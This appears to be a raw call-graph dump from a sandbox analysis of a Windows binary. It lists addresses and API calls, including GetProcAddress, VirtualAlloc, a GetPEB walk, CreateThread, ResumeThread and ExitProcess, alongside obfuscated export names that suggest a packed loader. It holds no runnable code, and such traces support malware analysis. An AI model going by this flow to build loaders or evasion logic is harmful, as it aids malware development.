22194->22197 22201 27a8d86 2 API calls 22194->22201 22196 27a9dc9 2 API calls 22195->22196 22200 27a2409 22196->22200 22198 27a8d86 2 API calls 22197->22198 22198->22195 22199 27a9f8f 2 API calls 22207 27a229b 22199->22207 22201->22194 22202 27a9bf7 RtlAllocateHeap lstrcatW 22202->22207 22203 27a8d41 HeapFree memset 22203->22207 22204 27a8d86 HeapFree memset 22204->22207 22205 27a109a 2 API calls 22205->22207 22206 27ab798 memset GetExitCodeProcess 22206->22207 22207->22191 22207->22199 22207->22202 22207->22203 22207->22204 22207->22205 22207->22206 22209 27a97ff 2 API calls 22208->22209 22210 27a226c 22209->22210 22210->22189 22226 27a8d70 RtlAllocateHeap 22211->22226 22213 27ac509 22214 27a9a5a RtlAllocateHeap 22213->22214 22225 27ac58d 22213->22225 22215 27ac527 22214->22215 22216 27a9a5a RtlAllocateHeap 22215->22216 22217 27ac53a 22216->22217 22218 27a9a5a RtlAllocateHeap 22217->22218 22219 27ac54e 22218->22219 22220 27a9f8f 2 API calls 22219->22220 22221 27ac55b 22220->22221 22222 27a8d41 2 API calls 22221->22222 22223 27ac581 22222->22223 22224 27a9a5a RtlAllocateHeap 22223->22224 22224->22225 22225->22207 22226->22213 22276 27a2412 22277 27a2442 22276->22277 22280 27a244f 22276->22280 22307 27a9c4c 22277->22307 22279 27a9890 2 API calls 22281 27a247c 22279->22281 22280->22279 22282 27a2459 22280->22282 22283 27abfd9 2 API calls 22281->22283 22284 27a2494 22283->22284 22285 27a249b 22284->22285 22286 27a9acd 2 API calls 22284->22286 22287 27a8d86 2 API calls 22285->22287 22288 27a24aa 22286->22288 22289 27a25ff 22287->22289 22290 27ac4e2 5 API calls 22288->22290 22291 27a8d86 2 API calls 22289->22291 22306 27a24b5 22290->22306 22292 27a260a 22291->22292 22293 27a8d86 2 API calls 22292->22293 22300 27a2616 22293->22300 22294 27a263e 22295 27a9dc9 2 API calls 22294->22295 22295->22282 22296 27a2633 22299 27a8d86 2 API calls 22296->22299 22297 27a9f8f 2 API calls 22297->22306 22298 27a8d86 2 API calls 22298->22300 22299->22294 22300->22294 22300->22296 22300->22298 22301 27a9bf7 RtlAllocateHeap lstrcatW 22301->22306 22302 27a8d41 2 API calls 22302->22306 22303 27a9a5a RtlAllocateHeap 22303->22306 22304 27ab798 memset GetExitCodeProcess 22304->22306 22305 27a8d86 HeapFree memset 22305->22306 22306->22285 22306->22297 22306->22301 22306->22302 22306->22303 22306->22304 22306->22305 22311 27a9c63 22307->22311 22309 27a9cc9 22309->22280 22310 27a9ca4 lstrcatA 22312 27a9cb8 lstrcatA 22310->22312 22313 27a9c99 22310->22313 22314 27a8d70 RtlAllocateHeap 22311->22314 22312->22313 22313->22309 22313->22310 22314->22313 20975 6d508123 20976 6d50812f ___scrt_is_nonwritable_in_current_image 20975->20976 20995 6d50853c 20976->20995 20978 6d508136 20979 6d508163 20978->20979 20987 6d50813b ___scrt_is_nonwritable_in_current_image 20978->20987 21017 6d50880e IsProcessorFeaturePresent 20978->21017 21006 6d50849f 20979->21006 20982 6d508172 __RTC_Initialize 20982->20987 21009 6d508716 20982->21009 20986 6d50818a 20988 6d508716 29 API calls 20986->20988 20989 6d508196 ___scrt_initialize_default_local_stdio_options 20988->20989 21013 6d50a322 20989->21013 20993 6d5081b7 20993->20987 21025 6d50a2c6 20993->21025 20996 6d508545 20995->20996 21029 6d5089eb IsProcessorFeaturePresent 20996->21029 21000 6d508556 21001 6d50855a 21000->21001 21040 6d50b379 21000->21040 21001->20978 21004 6d508571 21004->20978 21096 6d508575 21006->21096 21008 6d5084a6 21008->20982 21101 6d5086db 21009->21101 21012 6d5087c7 InitializeSListHead 21012->20986 21016 6d50a339 21013->21016 21014 6d508b95 _ValidateLocalCookies 5 API calls 21015 6d5081ac 21014->21015 21015->20987 21021 6d508474 21015->21021 21016->21014 21018 6d508824 ___scrt_fastfail 21017->21018 21019 6d5088cc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 21018->21019 21020 6d508916 21019->21020 21020->20979 21022 6d508479 ___scrt_initialize_onexit_tables 21021->21022 21023 6d5089eb ___isa_available_init IsProcessorFeaturePresent 21022->21023 21024 6d508482 21022->21024 21023->21024 21024->20993 21026 6d50a2f5 21025->21026 21027 6d508b95 _ValidateLocalCookies 5 API calls 21026->21027 21028 6d50a31e 21027->21028 21028->20987 21030 6d508551 21029->21030 21031 6d509556 21030->21031 21032 6d50955b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 21031->21032 21051 6d509871 21032->21051 21036 6d509571 21037 6d50957c 21036->21037 21065 6d5098ad 21036->21065 21037->21000 21039 6d509569 21039->21000 21088 6d50e35c 21040->21088 21043 6d509595 21044 6d5095af 21043->21044 21045 6d50959e 21043->21045 21044->21001 21046 6d509856 ___vcrt_uninitialize_ptd 6 API calls 21045->21046 21047 6d5095a3 21046->21047 21048 6d5098ad ___vcrt_uninitialize_locks DeleteCriticalSection 21047->21048 21049 6d5095a8 21048->21049 21092 6d509b85 21049->21092 21052 6d50987a 21051->21052 21054 6d5098a3 21052->21054 21056 6d509565 21052->21056 21069 6d509b05 21052->21069 21055 6d5098ad ___vcrt_uninitialize_locks DeleteCriticalSection 21054->21055 21055->21056 21056->21039 21057 6d509823 21056->21057 21074 6d509a1a 21057->21074 21059 6d50982d 21060 6d509838 21059->21060 21061 6d509ac8 ___vcrt_FlsSetValue 6 API calls 21059->21061 21060->21036 21062 6d509846 21061->21062 21063 6d509853 21062->21063 21079 6d509856 21062->21079 21063->21036 21066 6d5098d7 21065->21066 21067 6d5098b8 21065->21067 21066->21039 21068 6d5098c2 DeleteCriticalSection 21067->21068 21068->21066 21068->21068 21070 6d5098f9 try_get_function 5 API calls 21069->21070 21071 6d509b1f 21070->21071 21072 6d509b3c InitializeCriticalSectionAndSpinCount 21071->21072 21073 6d509b28 21071->21073 21072->21073 21073->21052 21075 6d5098f9 try_get_function 5 API calls 21074->21075 21076 6d509a34 21075->21076 21077 6d509a4c TlsAlloc 21076->21077 21078 6d509a3d 21076->21078 21078->21059 21080 6d509860 21079->21080 21081 6d509866 21079->21081 21083 6d509a54 21080->21083 21081->21060 21084 6d5098f9 try_get_function 5 API calls 21083->21084 21085 6d509a6e 21084->21085 21086 6d509a85 TlsFree 21085->21086 21087 6d509a7a 21085->21087 21086->21087 21087->21081 21089 6d50e375 21088->21089 21090 6d508b95 _ValidateLocalCookies 5 API calls 21089->21090 21091 6d508563 21090->21091 21091->21004 21091->21043 21093 6d509b8e 21092->21093 21095 6d509bb4 21092->21095 21094 6d509b9e FreeLibrary 21093->21094 21093->21095 21094->21093 21095->21044 21097 6d508583 21096->21097 21100 6d508588 ___scrt_initialize_onexit_tables 21096->21100 21098 6d50880e ___scrt_fastfail 4 API calls 21097->21098 21097->21100 21099 6d50860b 21098->21099 21100->21008 21102 6d5086f8 21101->21102 21103 6d5086ff 21101->21103 21107 6d50b1f1 21102->21107 21110 6d50b261 21103->21110 21106 6d508185 21106->21012 21108 6d50b261 __onexit 29 API calls 21107->21108 21109 6d50b203 21108->21109 21109->21106 21113 6d50af49 21110->21113 21116 6d50ae7f 21113->21116 21115 6d50af6d 21115->21106 21117 6d50ae8b ___scrt_is_nonwritable_in_current_image 21116->21117 21124 6d50c2f6 EnterCriticalSection 21117->21124 21119 6d50ae99 21125 6d50b0b0 21119->21125 21121 6d50aea6 21135 6d50aec4 21121->21135 21123 6d50aeb7 ___scrt_is_nonwritable_in_current_image 21123->21115 21124->21119 21126 6d50b0ce 21125->21126 21133 6d50b0c6 __onexit __crt_fast_encode_pointer 21125->21133 21127 6d50b127 21126->21127 21126->21133 21138 6d50e0db 21126->21138 21128 6d50e0db __onexit 29 API calls 21127->21128 21127->21133 21130 6d50b13d 21128->21130 21134 6d50b3fe ___free_lconv_mon 20 API calls 21130->21134 21131 6d50b11d 21132 6d50b3fe ___free_lconv_mon 20 API calls 21131->21132 21132->21127 21133->21121 21134->21133 21187 6d50c33e LeaveCriticalSection 21135->21187 21137 6d50aece 21137->21123 21139 6d50e0e6 21138->21139 21140 6d50e10e 21139->21140 21141 6d50e0ff 21139->21141 21142 6d50e11d 21140->21142 21147 6d510768 21140->21147 21143 6d50bf62 __dosmaperr 20 API calls 21141->21143 21154 6d51079b 21142->21154 21146 6d50e104 ___scrt_fastfail 21143->21146 21146->21131 21148 6d510773 21147->21148 21149 6d510788 HeapSize 21147->21149 21150 6d50bf62 __dosmaperr 20 API calls 21148->21150 21149->21142 21151 6d510778 21150->21151 21166 6d50bea6 21151->21166 21155 6d5107b3 21154->21155 21156 6d5107a8 21154->21156 21158 6d5107bb 21155->21158 21164 6d5107c4 __dosmaperr 21155->21164 21180 6d50b438 21156->21180 21161 6d50b3fe ___free_lconv_mon 20 API calls 21158->21161 21159 6d5107c9 21162 6d50bf62 __dosmaperr 20 API calls 21159->21162 21160 6d5107ee HeapReAlloc 21163 6d5107b0 21160->21163 21160->21164 21161->21163 21162->21163 21163->21146 21164->21159 21164->21160 21165 6d50e440 __dosmaperr 7 API calls 21164->21165 21165->21164 21169 6d50be2b 21166->21169 21168 6d50beb2 21168->21142 21170 6d50c8d8 __dosmaperr 20 API calls 21169->21170 21171 6d50be41 21170->21171 21172 6d50bea0 21171->21172 21176 6d50be4f 21171->21176 21173 6d50beb6 __cftof 11 API calls 21172->21173 21174 6d50bea5 21173->21174 21175 6d50be2b __cftof 26 API calls 21174->21175 21177 6d50beb2 21175->21177 21178 6d508b95 _ValidateLocalCookies 5 API calls 21176->21178 21177->21168 21179 6d50be76 21178->21179 21179->21168 21181 6d50b476 21180->21181 21185 6d50b446 __dosmaperr 21180->21185 21183 6d50bf62 __dosmaperr 20 API calls 21181->21183 21182 6d50b461 HeapAlloc 21184 6d50b474 21182->21184 21182->21185 21183->21184 21184->21163 21185->21181 21185->21182 21186 6d50e440 __dosmaperr 7 API calls 21185->21186 21186->21185 21187->21137 20609 6d5080d0 20610 6d5080db 20609->20610 20611 6d50810e dllmain_crt_process_detach 20609->20611 20612 6d508100 dllmain_crt_process_attach 20610->20612 20613 6d5080e0 20610->20613 20618 6d5080ea 20611->20618 20612->20618 20614 6d5080f6 20613->20614 20616 6d5080e5 20613->20616 20624 6d5084ad 20614->20624 20616->20618 20619 6d5084cc 20616->20619 20632 6d50b396 20619->20632 20929 6d50957f 20624->20929 20627 6d5084b6 20627->20618 20630 6d5084c9 20630->20618 20631 6d50958a 27 API calls 20631->20627 20638 6d50c828 20632->20638 20635 6d50958a 20894 6d50975b 20635->20894 20639 6d50c832 20638->20639 20640 6d5084d1 20638->20640 20646 6d50cbf4 20639->20646 20640->20635 20666 6d50c9bd 20646->20666 20648 6d50cc1b 20649 6d50cc33 TlsGetValue 20648->20649 20650 6d50cc27 20648->20650 20649->20650 20672 6d508b95 20650->20672 20652 6d50c839 20652->20640 20653 6d50cc4a 20652->20653 20654 6d50c9bd __dosmaperr 5 API calls 20653->20654 20655 6d50cc71 20654->20655 20656 6d50cc8c TlsSetValue 20655->20656 20657 6d50cc80 20655->20657 20656->20657 20658 6d508b95 _ValidateLocalCookies 5 API calls 20657->20658 20659 6d50c84c 20658->20659 20660 6d50c713 20659->20660 20661 6d50c72e 20660->20661 20662 6d50c71e 20660->20662 20661->20640 20687 6d50c734 20662->20687 20670 6d50c9e9 20666->20670 20671 6d50c9ed __crt_fast_encode_pointer 20666->20671 20667 6d50ca0d 20669 6d50ca19 GetProcAddress 20667->20669 20667->20671 20669->20671 20670->20667 20670->20671 20679 6d50ca59 20670->20679 20671->20648 20673 6d508ba0 IsProcessorFeaturePresent 20672->20673 20674 6d508b9e 20672->20674 20676 6d508be2 20673->20676 20674->20652 20686 6d508ba6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20676->20686 20678 6d508cc5 20678->20652 20680 6d50ca7a LoadLibraryExW 20679->20680 20681 6d50ca6f 20679->20681 20682 6d50ca97 GetLastError 20680->20682 20683 6d50caaf 20680->20683 20681->20670 20682->20683 20684 6d50caa2 LoadLibraryExW 20682->20684 20683->20681 20685 6d50cac6 FreeLibrary 20683->20685 20684->20683 20685->20681 20686->20678 20688 6d50c74d 20687->20688 20689 6d50c747 20687->20689 20691 6d50b3fe ___free_lconv_mon 20 API calls 20688->20691 20690 6d50b3fe ___free_lconv_mon 20 API calls 20689->20690 20690->20688 20692 6d50c759 20691->20692 20693 6d50b3fe ___free_lconv_mon 20 API calls 20692->20693 20694 6d50c764 20693->20694 20695 6d50b3fe ___free_lconv_mon 20 API calls 20694->20695 20696 6d50c76f 20695->20696 20697 6d50b3fe ___free_lconv_mon 20 API calls 20696->20697 20698 6d50c77a 20697->20698 20699 6d50b3fe ___free_lconv_mon 20 API calls 20698->20699 20700 6d50c785 20699->20700 20701 6d50b3fe ___free_lconv_mon 20 API calls 20700->20701 20702 6d50c790 20701->20702 20703 6d50b3fe ___free_lconv_mon 20 API calls 20702->20703 20704 6d50c79b 20703->20704 20705 6d50b3fe ___free_lconv_mon 20 API calls 20704->20705 20706 6d50c7a6 20705->20706 20707 6d50b3fe ___free_lconv_mon 20 API calls 20706->20707 20708 6d50c7b4 20707->20708 20719 6d50c5fa 20708->20719 20713 6d50b3fe 20714 6d50b432 __dosmaperr 20713->20714 20715 6d50b409 HeapFree 20713->20715 20714->20661 20715->20714 20716 6d50b41e 20715->20716 20829 6d50bf62 20716->20829 20725 6d50c506 20719->20725 20721 6d50c61e 20722 6d50c64a 20721->20722 20738 6d50c567 20722->20738 20724 6d50c66e 20724->20713 20726 6d50c512 ___scrt_is_nonwritable_in_current_image 20725->20726 20733 6d50c2f6 EnterCriticalSection 20726->20733 20728 6d50c546 20734 6d50c55b 20728->20734 20730 6d50c553 ___scrt_is_nonwritable_in_current_image 20730->20721 20731 6d50c51c 20731->20728 20732 6d50b3fe ___free_lconv_mon 20 API calls 20731->20732 20732->20728 20733->20731 20737 6d50c33e LeaveCriticalSection 20734->20737 20736 6d50c565 20736->20730 20737->20736 20739 6d50c573 ___scrt_is_nonwritable_in_current_image 20738->20739 20746 6d50c2f6 EnterCriticalSection 20739->20746 20741 6d50c57d 20747 6d50c7dd 20741->20747 20743 6d50c590 20751 6d50c5a6 20743->20751 20745 6d50c59e ___scrt_is_nonwritable_in_current_image 20745->20724 20746->20741 20748 6d50c7ec __fassign 20747->20748 20750 6d50c813 __fassign 20747->20750 20748->20750 20754 6d50f990 20748->20754 20750->20743 20828 6d50c33e LeaveCriticalSection 20751->20828 20753 6d50c5b0 20753->20745 20756 6d50fa10 20754->20756 20757 6d50f9a6 20754->20757 20758 6d50b3fe ___free_lconv_mon 20 API calls 20756->20758 20781 6d50fa5e 20756->20781 20757->20756 20761 6d50f9d9 20757->20761 20764 6d50b3fe ___free_lconv_mon 20 API calls 20757->20764 20759 6d50fa32 20758->20759 20760 6d50b3fe ___free_lconv_mon 20 API calls 20759->20760 20762 6d50fa45 20760->20762 20765 6d50b3fe ___free_lconv_mon 20 API calls 20761->20765 20780 6d50f9fb 20761->20780 20766 6d50b3fe ___free_lconv_mon 20 API calls 20762->20766 20763 6d50b3fe ___free_lconv_mon 20 API calls 20767 6d50fa05 20763->20767 20769 6d50f9ce 20764->20769 20770 6d50f9f0 20765->20770 20771 6d50fa53 20766->20771 20772 6d50b3fe ___free_lconv_mon 20 API calls 20767->20772 20768 6d50facc 20773 6d50b3fe ___free_lconv_mon 20 API calls 20768->20773 20782 6d510d87 20769->20782 20810 6d510e85 20770->20810 20777 6d50b3fe ___free_lconv_mon 20 API calls 20771->20777 20772->20756 20778 6d50fad2 20773->20778 20775 6d50b3fe 20 API calls ___free_lconv_mon 20779 6d50fa6c 20775->20779 20777->20781 20778->20750 20779->20768 20779->20775 20780->20763 20822 6d50fb03 20781->20822 20783 6d510e81 20782->20783 20784 6d510d98 20782->20784 20783->20761 20785 6d510da9 20784->20785 20787 6d50b3fe ___free_lconv_mon 20 API calls 20784->20787 20786 6d510dbb 20785->20786 20788 6d50b3fe ___free_lconv_mon 20 API calls 20785->20788 20789 6d510dcd 20786->20789 20790 6d50b3fe ___free_lconv_mon 20 API calls 20786->20790 20787->20785 20788->20786 20791 6d510ddf 20789->20791 20792 6d50b3fe ___free_lconv_mon 20 API calls 20789->20792 20790->20789 20793 6d510df1 20791->20793 20795 6d50b3fe ___free_lconv_mon 20 API calls 20791->20795 20792->20791 20794 6d510e03 20793->20794 20796 6d50b3fe ___free_lconv_mon 20 API calls 20793->20796 20797 6d510e15 20794->20797 20798 6d50b3fe ___free_lconv_mon 20 API calls 20794->20798 20795->20793 20796->20794 20799 6d510e27 20797->20799 20800 6d50b3fe ___free_lconv_mon 20 API calls 20797->20800 20798->20797 20801 6d510e39 20799->20801 20803 6d50b3fe ___free_lconv_mon 20 API calls 20799->20803 20800->20799 20802 6d510e4b 20801->20802 20804 6d50b3fe ___free_lconv_mon 20 API calls 20801->20804 20805 6d510e5d 20802->20805 20806 6d50b3fe ___free_lconv_mon 20 API calls 20802->20806 20803->20801 20804->20802 20807 6d510e6f 20805->20807 20808 6d50b3fe ___free_lconv_mon 20 API calls 20805->20808 20806->20805 20807->20783 20809 6d50b3fe ___free_lconv_mon 20 API calls 20807->20809 20808->20807 20809->20783 20811 6d510e92 20810->20811 20821 6d510eea 20810->20821 20812 6d510ea2 20811->20812 20814 6d50b3fe ___free_lconv_mon 20 API calls 20811->20814 20813 6d510eb4 20812->20813 20815 6d50b3fe ___free_lconv_mon 20 API calls 20812->20815 20816 6d510ec6 20813->20816 20817 6d50b3fe ___free_lconv_mon 20 API calls 20813->20817 20814->20812 20815->20813 20818 6d50b3fe ___free_lconv_mon 20 API calls 20816->20818 20819 6d510ed8 20816->20819 20817->20816 20818->20819 20820 6d50b3fe ___free_lconv_mon 20 API calls 20819->20820 20819->20821 20820->20821 20821->20780 20823 6d50fb10 20822->20823 20827 6d50fb2e 20822->20827 20824 6d510f2a __fassign 20 API calls 20823->20824 20823->20827 20825 6d50fb28 20824->20825 20826 6d50b3fe ___free_lconv_mon 20 API calls 20825->20826 20826->20827 20827->20779 20828->20753 20832 6d50c8d8 GetLastError 20829->20832 20833 6d50c8f1 20832->20833 20834 6d50c8f7 20832->20834 20835 6d50cbf4 __dosmaperr 11 API calls 20833->20835 20838 6d50c94e SetLastError 20834->20838 20851 6d50b523 20834->20851 20835->20834 20840 6d50b424 GetLastError 20838->20840 20839 6d50c911 20842 6d50b3fe ___free_lconv_mon 17 API calls 20839->20842 20840->20714 20841 6d50cc4a __dosmaperr 11 API calls 20843 6d50c926 20841->20843 20844 6d50c917 20842->20844 20843->20839 20845 6d50c92d 20843->20845 20847 6d50c945 SetLastError 20844->20847 20858 6d50c69a 20845->20858 20847->20840 20856 6d50b530 __dosmaperr 20851->20856 20852 6d50b570 20855 6d50bf62 __dosmaperr 19 API calls 20852->20855 20853 6d50b55b RtlAllocateHeap 20854 6d50b56e 20853->20854 20853->20856 20854->20839 20854->20841 20855->20854 20856->20852 20856->20853 20863 6d50e440 20856->20863 20874 6d50c672 20858->20874 20868 6d50e484 20863->20868 20865 6d508b95 _ValidateLocalCookies 5 API calls 20866 6d50e480 20865->20866 20866->20856 20867 6d50e456 20867->20865 20869 6d50e490 ___scrt_is_nonwritable_in_current_image 20868->20869 20870 6d50c2f6 _abort EnterCriticalSection 20869->20870 20871 6d50e49b 20870->20871 20872 6d50e4cd __dosmaperr LeaveCriticalSection 20871->20872 20873 6d50e4c2 ___scrt_is_nonwritable_in_current_image 20872->20873 20873->20867 20880 6d50c5b2 20874->20880 20876 6d50c696 20881 6d50c5be ___scrt_is_nonwritable_in_current_image 20880->20881 20882 6d50c2f6 _abort EnterCriticalSection 20881->20882 20883 6d50c5c8 20882->20883 20884 6d50c5ee __dosmaperr LeaveCriticalSection 20883->20884 20885 6d50c5e6 ___scrt_is_nonwritable_in_current_image 20884->20885 20885->20876 20895 6d509768 20894->20895 20901 6d5084d6 20894->20901 20896 6d509776 20895->20896 20902 6d509a8e 20895->20902 20907 6d509ac8 20896->20907 20899 6d509786 20912 6d50973f 20899->20912 20901->20618 20916 6d5098f9 20902->20916 20904 6d509aa8 20905 6d509abf TlsGetValue 20904->20905 20906 6d509ab4 20904->20906 20905->20906 20906->20896 20908 6d5098f9 try_get_function 5 API calls 20907->20908 20909 6d509ae2 20908->20909 20910 6d509af1 20909->20910 20911 6d509afc TlsSetValue 20909->20911 20910->20899 20911->20910 20913 6d509749 20912->20913 20915 6d509756 20912->20915 20914 6d50b3fe ___free_lconv_mon 20 API calls 20913->20914 20913->20915 20914->20915 20915->20901 20918 6d509929 20916->20918 20920 6d50992d __crt_fast_encode_pointer 20916->20920 20917 6d50994d 20917->20920 20921 6d509959 GetProcAddress 20917->20921 20918->20917 20918->20920 20922 6d509999 20918->20922 20920->20904 20921->20920 20923 6d5099c1 LoadLibraryExW 20922->20923 20926 6d5099b6 20922->20926 20924 6d5099f5 20923->20924 20925 6d5099dd GetLastError 20923->20925 20924->20926 20927 6d509a0c FreeLibrary 20924->20927 20925->20924 20928 6d5099e8 LoadLibraryExW 20925->20928 20926->20918 20927->20926 20928->20924 20935 6d509791 20929->20935 20931 6d5084b2 20931->20627 20932 6d50b38b 20931->20932 20933 6d50c8d8 __dosmaperr 20 API calls 20932->20933 20934 6d5084be 20933->20934 20934->20630 20934->20631 20936 6d50979a 20935->20936 20937 6d50979d GetLastError 20935->20937 20936->20931 20938 6d509a8e ___vcrt_FlsGetValue 6 API calls 20937->20938 20939 6d5097b2 20938->20939 20940 6d5097d1 20939->20940 20941 6d509817 SetLastError 20939->20941 20942 6d509ac8 ___vcrt_FlsSetValue 6 API calls 20939->20942 20940->20941 20941->20931 20943 6d5097cb 20942->20943 20943->20940 20944 6d50b523 __dosmaperr 20 API calls 20943->20944 20945 6d5097df 20944->20945 20946 6d5097f3 20945->20946 20947 6d509ac8 ___vcrt_FlsSetValue 6 API calls 20945->20947 20948 6d509ac8 ___vcrt_FlsSetValue 6 API calls 20946->20948 20949 6d509807 20946->20949 20947->20946 20948->20949 20950 6d50b3fe ___free_lconv_mon 20 API calls 20949->20950 20950->20940 21190 6d5083d8 21191 6d5083e1 21190->21191 21192 6d5083e6 dllmain_dispatch 21190->21192 21194 6d50872b 21191->21194 21195 6d50875b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 21194->21195 21196 6d50874e 21194->21196 21197 6d508752 21195->21197 21196->21195 21196->21197 21197->21192 22848 27a26d8 22850 27a26e9 22848->22850 22854 27a2701 22848->22854 22856 27a7047 22850->22856 22853 27a9dc9 2 API calls 22855 27a271a 22853->22855 22879 27a2654 22854->22879 22857 27a7069 22856->22857 22858 27a7061 22856->22858 22859 27abfd9 2 API calls 22857->22859 22858->22854 22860 27a7072 22859->22860 22860->22858 22886 27b0eab 22860->22886 22863 27a8d86 2 API calls 22863->22858 22864 27a993a 7 API calls 22865 27a70c2 22864->22865 22865->22858 22866 27a66ae 5 API calls 22865->22866 22867 27a70d4 22866->22867 22868 27a70e1 22867->22868 22870 27a70f9 22867->22870 22869 27a8d86 2 API calls 22868->22869 22869->22858 22871 27a5bab 8 API calls 22870->22871 22878 27a7119 22870->22878 22875 27a7115 22871->22875 22872 27a8d86 2 API calls 22873 27a714b 22872->22873 22874 27a8d86 2 API calls 22873->22874 22876 27a708c 22874->22876 22877 27aac02 6 API calls 22875->22877 22875->22878 22876->22863 22877->22878 22878->22872 22880 27abfd9 2 API calls 22879->22880 22881 27a2665 22880->22881 22884 27a267c 22881->22884 22885 27a2689 22881->22885 22897 27aadcc 22881->22897 22883 27a8d86 2 API calls 22883->22885 22884->22883 22885->22853 22887 27b0eba 22886->22887 22888 27b0ef6 22886->22888 22890 27a8d86 2 API calls 22887->22890 22896 27a8d70 RtlAllocateHeap 22888->22896 22891 27b0ec3 22890->22891 22892 27a8dd5 RtlAllocateHeap 22891->22892 22894 27a7086 22891->22894 22893 27b0eda 22892->22893 22893->22894 22895 27afc1c lstrlenW 22893->22895 22894->22864 22894->22876 22895->22894 22896->22891 22898 27aade8 6 API calls 22897->22898 22899 27aade3 22898->22899 22899->22884 21188 27a63de 21189 27a63ee ExitProcess 21188->21189 21633 6d50ebec 21634 6d50ebf9 21633->21634 21635 6d50b523 __dosmaperr 20 API calls 21634->21635 21636 6d50ec13 21635->21636 21637 6d50b3fe ___free_lconv_mon 20 API calls 21636->21637 21638 6d50ec1f 21637->21638 21639 6d50b523 __dosmaperr 20 API calls 21638->21639 21643 6d50ec45 21638->21643 21640 6d50ec39 21639->21640 21642 6d50b3fe ___free_lconv_mon 20 API calls 21640->21642 21642->21643 21644 6d50ec51 21643->21644 21645 6d50cca3 21643->21645 21646 6d50c9bd __dosmaperr 5 API calls 21645->21646 21647 6d50ccca 21646->21647 21648 6d50ccd3 21647->21648 21649 6d50cce8 InitializeCriticalSectionAndSpinCount 21647->21649 21650 6d508b95 _ValidateLocalCookies 5 API calls 21648->21650 21649->21648 21651 6d50ccff 21650->21651 21651->21643 18778 6d514181 18781 6d518f63 18778->18781 18795 6d506fc7 18781->18795 18783 6d519046 18805 6d50768e SNifCw242OCD Mqae01id 18783->18805 18789 6d519272 18790 6d5192a2 18789->18790 18791 6d51937f 18789->18791 18794 6d51418b 18789->18794 18828 6d5173b5 18790->18828 18793 6d5193aa SNifCw242OCD 18791->18793 18791->18794 18793->18791 18796 6d50704b 18795->18796 18804 6d507227 18795->18804 18856 6d506ce5 18796->18856 18802 6d5071d3 18884 6d504dfd 18802->18884 18804->18783 18951 6d513e64 18805->18951 18808 6d507953 18810 6d5143a4 SetEndOfFile 18808->18810 18812 6d50794b 18808->18812 18813 6d51a07d 2 API calls 18808->18813 18809 6d507881 18960 6d5029e2 18809->18960 18810->18808 18815 6d502ae5 18812->18815 18814 6d507b43 LeaveCriticalSection 18813->18814 18814->18808 18816 6d502c25 18815->18816 18817 6d502b48 18815->18817 18820 6d502c78 18816->18820 18824 6d502c13 18816->18824 18974 6d518a58 18817->18974 18819 6d502b94 18984 6d5045c9 18819->18984 18990 6d506bba 18820->18990 18823 6d502e8e 18836 6d50391b 18823->18836 18824->18823 18825 6d502d1d 18824->18825 18825->18824 18826 6d506bba LoadLibraryA 18825->18826 18827 6d502e8b 18826->18827 18827->18823 18829 6d517457 18828->18829 18830 6d51742c 18828->18830 18829->18794 18831 6d5174d5 18830->18831 18832 6d517449 18830->18832 18831->18829 18833 6d518891 11 API calls 18831->18833 19004 27a8d5b HeapCreate 18832->19004 19005 27a65a7 18832->19005 18833->18829 18837 6d503993 18836->18837 18841 6d503b6e 18836->18841 18838 6d5039a1 GetProcAddress 18837->18838 18839 6d503a35 18837->18839 18838->18841 20603 6d515150 18839->20603 18842 6d503c27 GetProcAddress 18841->18842 18851 6d503f18 18841->18851 18843 6d503c7b VirtualAlloc 18842->18843 18855 6d503d79 18842->18855 18850 6d503ca3 18843->18850 18843->18855 18844 6d5041c2 18847 6d50226b 11 API calls 18844->18847 18845 6d504152 18846 6d506b43 2 API calls 18845->18846 18849 6d504186 18846->18849 18847->18849 18848 6d503ed5 GetPEB 18848->18851 18849->18789 18852 6d503ced ExitProcess 18850->18852 18854 6d503d46 VirtualAlloc 18850->18854 18851->18844 18851->18845 18854->18855 18855->18848 18855->18855 18857 6d506fb9 18856->18857 18858 6d506d79 18856->18858 18866 6d51a27e 18857->18866 18863 6d506ded 18858->18863 18892 6d5151f2 18858->18892 18859 6d506e70 18899 6d501000 18859->18899 18860 6d506f57 18865 6d506f7a EnterCriticalSection LeaveCriticalSection 18860->18865 18863->18859 18863->18860 18865->18857 18867 6d51a2f4 18866->18867 18874 6d51a350 18866->18874 18869 6d51a35a 18867->18869 18870 6d51a30e 18867->18870 18867->18874 18868 6d50226b 9 API calls 18873 6d51a498 18868->18873 18872 6d51a36b 18869->18872 18876 6d51a3d9 18869->18876 18933 6d504843 18870->18933 18872->18874 18875 6d51a376 EnterCriticalSection 18872->18875 18939 6d514f75 18873->18939 18874->18868 18875->18874 18876->18874 18878 6d51a3ff OpenThread 18876->18878 18878->18874 18879 6d507137 18880 6d51a07d 18879->18880 18881 6d51a0d9 18880->18881 18882 6d51a0e7 18880->18882 18881->18882 18883 6d51a1ff ActivateActCtx ResumeThread 18881->18883 18882->18802 18883->18882 18885 6d504e68 18884->18885 18888 6d504f98 18884->18888 18886 6d515750 2 API calls 18885->18886 18887 6d504e9c 18886->18887 18890 6d5143a4 SetEndOfFile 18887->18890 18889 6d5151f2 11 API calls 18888->18889 18891 6d504f3c 18888->18891 18889->18888 18890->18891 18891->18804 18893 6d515270 18892->18893 18897 6d5152e7 18892->18897 18894 6d515282 18893->18894 18895 6d51541a 18893->18895 18894->18897 18908 6d504294 18894->18908 18895->18897 18898 6d515443 GetLastError 18895->18898 18897->18863 18898->18895 18900 6d501096 18899->18900 18903 6d5011a8 18899->18903 18912 6d5185cb 18900->18912 18907 6d5012d0 18903->18907 18915 6d50226b 18903->18915 18904 6d501151 GHQvB58h2E 18904->18857 18906 6d501289 CreateThread 18906->18903 18906->18907 18923 6d5143a4 18907->18923 18909 6d50432c 18908->18909 18910 6d50441d 18908->18910 18909->18897 18910->18909 18911 6d51a27e 11 API calls 18910->18911 18911->18910 18913 6d51881a CreateActCtxA 18912->18913 18914 6d5185f3 18912->18914 18913->18914 18914->18904 18914->18914 18916 6d5022ee 18915->18916 18921 6d5022f8 18915->18921 18917 6d50238b CreateFileA SetFilePointer 18916->18917 18916->18921 18918 6d5151f2 8 API calls 18917->18918 18919 6d50248f 18918->18919 18927 6d518891 18919->18927 18921->18906 18924 6d5143cb 18923->18924 18925 6d5143e0 18923->18925 18924->18925 18926 6d5144d5 